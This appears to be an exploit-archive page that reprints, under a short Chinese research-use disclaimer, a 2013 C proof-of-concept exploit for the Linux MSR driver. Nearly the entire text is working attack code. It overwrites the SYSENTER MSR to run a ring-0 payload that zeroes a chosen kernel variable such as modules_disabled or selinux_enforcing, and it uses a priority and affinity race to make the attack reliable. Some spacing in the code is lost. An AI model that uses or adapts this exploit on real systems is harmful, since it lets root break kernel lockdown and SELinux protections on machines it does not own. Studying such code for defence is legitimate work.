Linux Kernel 'MSR' Driver Local Privilege Escalation

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

1. // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
2. // can do whatever in the commented area, re-enable module support, etc
3. // requires CONFIG_X86_MSR and just uid 0
4. // a small race exists between the time when the MSR is written to the first
5. // time and when we issue our sysenter
6. // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
7. // configured to take a hex arg of a dword pointer to set to 0
8. // (modules_disabled, selinux_enforcing, take your pick)
9. //
10. // Hello to Red Hat, who has shown yet again to not care until a
11. // public exploit is released. Not even a bugtraq entry existed in
12. // their system until this was published -- and they have a paid team
13. // of how many?
14. // It's not as if I didn't mention the problem and existence of an easy
15. // exploit multiple times prior:
16. // https://twitter.com/grsecurity/status/298977370776432640
17. // https://twitter.com/grsecurity/status/297365303095078912
18. // https://twitter.com/grsecurity/status/297189488638181376
19. // https://twitter.com/grsecurity/status/297030133628416000
20. // https://twitter.com/grsecurity/status/297029470072745984
21. // https://twitter.com/grsecurity/status/297028324134359041
22. //
23. // spender 2013
25. #define _GNU_SOURCE
26. #include<stdio.h>
27. #include<sched.h>
28. #include<unistd.h>
29. #include<sys/types.h>
30. #include<sys/stat.h>
31. #include<fcntl.h>
32. #include<stdlib.h>
33. #include<sys/time.h>
34. #include<sys/resource.h>
35. #include<sys/mman.h>
37. #define SYSENTER_EIP_MSR 0x176
39. u_int64_t msr;
41. unsignedlong ourstack[65536];
43. u_int64_t payload_data[16];
45. externvoid*_ring0;
46. externvoid*_ring0_end;
48. void ring0(void)
49. {
50. __asm volatile(".globl _ring0\n"
51. "_ring0:\n"
52. ".intel_syntax noprefix\n"
53. ".code64\n"
54. // set up stack pointer with 'ourstack'
55. "mov esp, ecx\n"
56. // save registers, contains the original MSR value
57. "push rax\n"
58. "push rbx\n"
59. "push rcx\n"
60. "push rdx\n"
61. // play with the kernel here with interrupts disabled!
62. "mov rcx, qword ptr [rbx+8]\n"
63. "test rcx, rcx\n"
64. "jz skip_write\n"
65. "mov dword ptr [rcx], 0\n"
66. "skip_write:\n"
67. // restore MSR value before returning
68. "mov ecx, 0x176\n"// SYSENTER_EIP_MSR
69. "mov eax, dword ptr [rbx]\n"
70. "mov edx, dword ptr [rbx+4]\n"
71. "wrmsr\n"
72. "pop rdx\n"
73. "pop rcx\n"
74. "pop rbx\n"
75. "pop rax\n"
76. "sti\n"
77. "sysexit\n"
78. ".code32\n"
79. ".att_syntax prefix\n"
80. ".global _ring0_end\n"
81. "_ring0_end:\n"
82. );
83. }
85. unsignedlong saved_stack;
87. int main(int argc,char*argv[])
88. {
89. cpu_set_tset;
90. int msr_fd;
91. int ret;
92. u_int64_t new_msr;
93. struct sched_param sched;
94. u_int64_t resolved_addr =0ULL;
96. if(argc ==2)
97. resolved_addr = strtoull(argv[1], NULL,16);
99. /* can do this without privilege */
100. mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
101. mlock(&payload_data,sizeof(payload_data));
103. CPU_ZERO(&set);
104. CPU_SET(0,&set);
106. sched.sched_priority =99;
108. ret = sched_setscheduler(0, SCHED_FIFO,&sched);
109. if(ret){
110. fprintf(stderr,"Unable to set priority.\n");
111. exit(1);
112. }
114. ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
115. if(ret){
116. fprintf(stderr,"Unable to set affinity.\n");
117. exit(1);
118. }
120. msr_fd = open("/dev/cpu/0/msr", O_RDWR);
121. if(msr_fd <0){
122. msr_fd = open("/dev/msr0", O_RDWR);
123. if(msr_fd <0){
124. fprintf(stderr,"Unable to open /dev/cpu/0/msr\n");
125. exit(1);
126. }
127. }
128. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
129. ret = read(msr_fd,&msr,sizeof(msr));
130. if(ret !=sizeof(msr)){
131. fprintf(stderr,"Unable to read /dev/cpu/0/msr\n");
132. exit(1);
133. }
135. // stuff some addresses in a buffer whose address we
136. // pass to the "kernel" via register
137. payload_data[0]= msr;
138. payload_data[1]= resolved_addr;
140. printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);
141. fflush(stdout);
143. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
144. new_msr =(u_int64_t)(unsignedlong)&_ring0;
146. printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);
147. fflush(stdout);
149. ret = write(msr_fd,&new_msr,sizeof(new_msr));
150. if(ret !=sizeof(new_msr)){
151. fprintf(stderr,"Unable to modify /dev/cpu/0/msr\n");
152. exit(1);
153. }
155. __asm volatile(
156. ".intel_syntax noprefix\n"
157. ".code32\n"
158. "mov saved_stack, esp\n"
159. "lea ecx, ourstack\n"
160. "lea edx, label2\n"
161. "lea ebx, payload_data\n"
162. "sysenter\n"
163. "label2:\n"
164. "mov esp, saved_stack\n"
165. ".att_syntax prefix\n"
166. );
168. printf("Success.\n");
170. return0;
171. }